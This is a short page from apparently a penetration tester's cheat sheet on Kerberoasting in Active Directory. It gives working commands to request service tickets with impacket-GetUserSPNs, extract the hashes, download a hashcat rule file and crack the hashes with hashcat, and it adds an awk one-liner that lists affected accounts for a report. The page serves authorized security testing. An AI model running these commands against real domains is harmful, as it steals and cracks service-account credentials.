Kerberoasting

Kerberoast Affected SPNs (NTLM)

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

Get only tickets for cracking

cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash

Crack tickets

wget https://github.com/stealthsploit/OneRuleToRuleThemStill/raw/refs/heads/main/OneRuleToRuleThemStill.rule
hashcat -m 13100 -a 0 kerb.hash rockyou.txt -r OneRuleToRuleThemStill.rule

The above is more of a POC on how to crack the hash, however, I'd STRONGLY recommend using something powerful to crack this hash as the above will take a long time. If you have have a powerful GPU, take a look into NPK or VPK.

Create affected SPN CSV

cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv

The above may miss SPNs when there is no "MemberOf" field in the SPN (I have seen this on a test before). Also, if you have two identical SPNs where one has the port at the end and the other does not, both will be reported.

PreviousActive Directory Password SprayingNextTimeroasting

Last updated